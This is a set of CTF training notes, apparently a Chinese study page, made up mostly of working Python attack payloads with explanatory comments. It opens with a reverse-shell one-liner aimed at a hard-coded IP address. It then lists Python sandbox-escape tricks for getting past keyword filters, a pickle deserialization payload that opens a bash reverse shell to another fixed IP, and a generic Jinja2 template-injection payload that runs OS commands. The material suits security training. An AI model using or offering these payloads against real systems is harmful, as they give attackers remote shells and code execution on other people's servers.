
CTF特训营-笔记(python)

前言

笔记

python反弹shell

# Reverse-shell one-liner: opens a raw TCP connection to the hard-coded listener
# 172.247.76.60:9999, dup2()s the socket over fds 0/1/2 (stdin/stdout/stderr) and
# spawns an interactive /bin/sh on it. Plain TCP, nothing is encrypted. Authorised
# CTF/lab use only -- start your own listener on that port and replace the address.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.247.76.60",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

沙箱逃逸

# Baseline (no filter): a plain `import os` and a shell call.
import os
os.system('ifconfig')            # returns the exit status; the command output goes straight to stdout
os.popen('ipconfig').read()      # captures the output as a string; `ipconfig` is the Windows command (`ifconfig` on Linux)
# Python 2 only: the `commands` module was removed in Python 3 (use subprocess there).
import commands # Linux, Python 2
commands.getoutput('ifconfig')          # returns the command output as a string
commands.getstatusoutput('ifconfig')    # returns (exit_status, output)
import subprocess
subprocess.call(['ipconfig'],shell=True)   # shell=True hands the command to a shell; `ipconfig` is the Windows command
import timeit
# timeit compiles and exec()s its statement string, so it doubles as an exec() primitive
# when `exec`/`eval` themselves are filtered.
timeit.timeit("__import__('os').system('whoami')", number=1)
import platform

# `platform` imports os internally, so `platform.os` is the already-loaded module --
# no `import os` statement is needed in the attacker's code.
platform.os.system("ls")

# platform.popen was deprecated in Python 3.3 and removed in 3.8; only works on older interpreters.
platform.popen('whoami', mode='r', bufsize=-1).read()

import pty

# Runs the program on a new pseudo-terminal (Unix only); accepts a string or an argv list.
pty.spawn("ls")
import cgi

# Same trick as platform.os: cgi imports os. Note the cgi module is deprecated since
# Python 3.11 and removed in 3.13 (PEP 594), so this stops working on new interpreters.
cgi.os.system('ls')

1.禁用import os

# A filter that matches the literal string "import os" is beaten by varying the
# whitespace between the keyword and the module name: the first line uses two
# spaces. (The second and third lines render identically here -- the original
# note presumably used a tab or another whitespace variant that the page
# rendering collapsed; verify before relying on them.)
import  os

import os

import os

2.过滤空格

# No `import` statement at all: the builtin does the import, and the whole
# expression contains no whitespace, so a filter on spaces does not fire.
__import__('os').system("ls")

import importlib

# Same idea via the importlib API.
importlib.import_module('os').system('ls')

3、过滤import

python2:

# Python 2 only: execfile runs os.py's source in the current namespace, so the
# `import` keyword never appears. The path is install-specific. (Python 3 has no
# execfile; the equivalent is exec(open(path).read()).)
execfile('/usr/lib/python2.7/os.py')

# os.py's top-level names, including system(), are now plain globals.
system('ls')

4、过滤os

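# The token "os" never appears literally in the source, so a filter on it does
# not fire; the module name is assembled at runtime instead.
__import__('so'[::-1]).system('ls')   # 'so'[::-1] == 'os'

b = 'o'

a = 's'

# Bug fix: the note had `a+b`, which is 'so' and raises ModuleNotFoundError;
# the two pieces must be joined the other way round to spell 'os'.
__import__(b+a).system('ls')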

5、使用exec或者eval

# The payload is stored reversed so neither "import" nor "os" appears in the
# source; [::-1] restores it before it is evaluated. Any path to eval/exec ends
# the sandbox.
eval(')"imaohw"(metsys.)"so"(__tropmi__'[::-1])   # reverses to: __import__("os").system("whoami")

exec(')"imaohw"(metsys.so ;so tropmi'[::-1])      # reverses to: import os; os.system("whoami")  (exec, since this is a statement)

6、恢复 sys.modules

如何禁用:

# Poisoning the import cache: needs `import sys` first (not shown). A later
# `import os` returns whatever sits in sys.modules['os'] -- here a str.
# This is NOT a security boundary: modules that already imported os keep their
# reference (see platform.os / cgi.os above) and the entry can simply be deleted
# again (see below).
sys.modules['os'] = 'not allowed'

import os                 # `os` is now the string 'not allowed'

os.system('ls')           # AttributeError: 'str' object has no attribute 'system'

恢复:

# Undo the poisoning: drop the cached entry, and the next import loads the real
# module from disk. Requires `sys` to be reachable.
del sys.modules['os']

import os

os.system('ls')

7、过滤system函数

# Assumes `import os` already happened. If `system` is filtered, popen (and the
# subprocess / pty / timeit routes shown above) give the same result.
print(os.system('whoami'))          # prints the exit status; the command output itself goes to stdout

print(os.popen('whoami').read())    # popen returns a file object, so the output is captured and printed

反序列化SHELL

def __reduce__(self):
s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.102.118.76",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'"""

return (os.system, (s,))

万能 SSTI（Jinja2 模板注入）

{# Generic Jinja2 SSTI payload. [].__class__.__base__ is `object`; its direct
   subclasses are walked to find warnings.catch_warnings, then the globals of
   that class's __init__ are scanned for a dict exposing 'eval' (presumably the
   warnings module's __builtins__ -- confirm on the target) and eval is used to
   run an OS command. The subclass list differs per interpreter/app, so the
   name lookup is what makes this portable; replace "ls /" with the command
   you need. #}
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("ls /").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}